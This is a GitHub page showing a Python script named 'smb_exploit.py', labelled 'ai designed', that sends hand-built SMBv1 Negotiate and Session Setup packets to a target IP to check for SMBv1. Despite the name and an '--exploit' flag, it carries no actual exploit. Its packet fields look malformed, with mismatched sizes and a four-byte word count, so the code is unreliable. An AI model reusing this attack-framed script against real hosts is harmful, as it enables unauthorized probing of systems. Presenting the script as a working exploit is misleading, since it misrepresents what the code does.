-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsmb_exploit.py
122 lines (110 loc) · 4.55 KB
/
smb_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
# ai designed!
# This tool is intended for educational purposes and authorized security testing only. Unauthorized access to systems is illegal and unethical. Always obtain permission before testing any systems.
# Bu araç eğitim amaçlı ve yetkilendirilmiş güvenlik testleri için tasarlanmıştır. İzin almadan sistemlere erişim yasa dışıdır ve etik dışıdır. Her zaman sistemleri test etmeden önce izin alın.
import socket
import struct
import argparse
import logging
import os
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
def smb_negotiate_protocol_request(ip, port):
smb_negotiate_protocol_request_packet = (
b"\x00\x00\x00\x85" # Message size
b"\xff\x53\x4d\x42" # Server Component: SMB
b"\x72" # SMB Command: Negotiate Protocol
b"\x00\x00\x00\x00" # NT Status
b"\x18" # Flags
b"\x01\x28" # Flags2
b"\x00\x00" # PID High
b"\x00\x00\x00\x00" # Security Features
b"\x00\x00" # Reserved
b"\x00\x00" # TID
b"\x00\x00" # PID Low
b"\x2f\x4b" # UID
b"\x00\x00" # MID
b"\x00\x00\x00\x00" # Word Count
b"\x0c" # Byte Count
b"\x02\x4c\x41\x4e" # Dialect
b"\x4d\x41\x4e\x31" # Dialect
b"\x2e\x30\x00" # Dialect
b"\x02\x4c\x4d\x31" # Dialect
b"\x2e\x32\x58\x30" # Dialect
b"\x30\x32\x00" # Dialect
)
logging.info("Sending SMB Negotiate Protocol Request")
try:
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect((ip, port))
conn.send(smb_negotiate_protocol_request_packet)
response = conn.recv(1024)
conn.close()
if response[4] == 0xff:
logging.info(f"{ip}:{port} - SMBv1 supported")
return True
else:
logging.info(f"{ip}:{port} - SMBv1 not supported")
return False
except Exception as e:
logging.error(f"Error: {e}")
return False
def smb_session_setup_andx_request(ip, port):
smb_session_setup_andx_request_packet = (
b"\x00\x00\x00\x63" # Message size
b"\xff\x53\x4d\x42" # Server Component: SMB
b"\x73" # SMB Command: Session Setup AndX
b"\x00\x00\x00\x00" # NT Status
b"\x18" # Flags
b"\x01\x20" # Flags2
b"\x00\x00" # PID High
b"\x00\x00\x00\x00" # Security Features
b"\x00\x00" # Reserved
b"\x00\x00" # TID
b"\x00\x00" # PID Low
b"\x2f\x4b" # UID
b"\x00\x00" # MID
b"\x0d" # Word Count
b"\xff" # AndX Command
b"\x00" # Reserved
b"\x00\x00" # AndX Offset
b"\xdf\xff" # Max Buffer
b"\x02\x00" # Max Mpx Count
b"\x01\x00" # VC Number
b"\x00\x00\x00\x00" # Session Key
b"\x00\x00\x00\x00" # Reserved
b"\x40\x00\x00\x00" # Capabilities
b"\x26\x00" # Byte Count
b"\x00" # Account
b"\x00" # Primary Domain
b"\x00" # Native OS
b"\x00" # Native LAN Manager
)
logging.info("Sending SMB Session Setup AndX Request")
try:
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect((ip, port))
conn.send(smb_session_setup_andx_request_packet)
response = conn.recv(1024)
conn.close()
if response[4] == 0xff:
logging.info(f"{ip}:{port} - Session Setup successful")
return True
else:
logging.info(f"{ip}:{port} - Session Setup failed")
return False
except Exception as e:
logging.error(f"Error: {e}")
return False
def main():
parser = argparse.ArgumentParser(prog="smb_exploit", description="smb exploit ai designed [options]")
parser.add_argument("target_ip", help="Target IP address")
parser.add_argument("-p", "--port", type=int, default=445, help="Target port (default: 445)")
parser.add_argument("--exploit", action="store_true", help="Send exploit")
args = parser.parse_args()
target_ip = args.target_ip
port = args.port
exploit = args.exploit
if smb_negotiate_protocol_request(target_ip, port):
if exploit:
smb_session_setup_andx_request(target_ip, port)
if __name__ == "__main__":
main()